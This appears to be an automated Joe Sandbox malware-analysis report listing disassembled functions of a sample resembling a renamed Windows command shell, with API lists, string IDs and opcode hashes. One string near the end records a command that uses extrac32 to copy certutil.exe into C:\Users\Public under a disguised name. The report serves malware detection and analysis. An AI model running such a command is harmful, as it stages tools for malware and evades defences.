                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcsrchr$towlower
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: fdpnxsatz
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3267374428-1106894203
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 261f3fd5d19b177633e4b839d75091a1dc457b5f944a135b5832a65174df383f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC42B322B0878285EB64AF259D242FAA7A1FF45BA4F945135DE0E077D9DF3CE442C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB7650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DPATH
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 95024817-2010427443
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 048ef8d9d2df7644c19e66c3fb970c5fc473ca56135aabbc427117329db25752
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3128232A18782C6EB64AF25AC2017BF6A1FF99754F885235EA4E577D4DF3CE4048B10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB5240 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 503COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: [...]$ [..]$ [.]$...$:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 0-1980097535
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 13215b991ec2afb149508fbe9acd784703df793feb52f28d202d005f7055cf4a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30327A66A0878286EB20EF25EC602FBA3A4FF45788F854235DB0D47695DF3CE545C760
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB6EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1795611712-3662956551
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: abc1283655abd0fe7e1616d7d8b52c2af7baa51eb228d3ee5bd73a0e3304f650
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FE1AF61E08742C6EB10AB64AC641FBE7A1FF98788FD85132DA0E47699DF3CE545C360
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDEE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 00007FF706EDEF33
                                                                                                                                                                                                                                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDEF98
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDEFA9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDEFBF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF706EDEFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDEFED
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDF003
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDF022
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDF083
                                                                                                                                                                                                                                                                                                                                                                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDF092
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDF0A5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF706EDF0DB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDF135
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDF16C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EDF185
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC01B8: _get_osfhandle.MSVCRT ref: 00007FF706EC01C4
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF706ECE904,?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC01D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: <noalias>$CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1161012917-1690691951
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b58a463ac40260b77c1f77e4a7b5237eff66e5f9bf10d296fb4dbda1cd5a4aa8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D918225B097528AFB14AB60EC241BFBAA1BF49B58FD88135DE0E477D5DF3C94498320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB32B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: _get_osfhandle.MSVCRT ref: 00007FF706EC3584
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC359C
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35C3
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35D9
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35ED
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC3602
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EB32F3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF706EB32A4), ref: 00007FF706EB3309
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF706EB3384
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF706ED11DF
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 611521582-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c9562f3c649ec05a48e5775319033dec44720243d2a26569a5842136aae17235
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94A17236F087128AFB14AB61AC642BFF6A1FF49B59F845135DE0E47784DF3CA4498620
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB1560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: \\?\
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 628682198-4282027825
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: bce36b1e46975bf9f7f844a5d7cffdccf7bf7393523b1b891f665061a44086b6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAE18F26B0878696EB64AB24DC602FBA3A0FF45759F806235DA0E477D4EF3CE545C350
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDAFBC Relevance: 26.0, APIs: 17, Instructions: 537COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 16309207-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b263e87aa813fb20c8c78fed0ce7d1c57c1a5bb470fe2093e83fe75a3cb20496
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A422A262B04B8686EF64AF24DC642FBA3A0FF45794F845135DA0E4BB95EF3CE1458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBCE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3863671652-4137775220
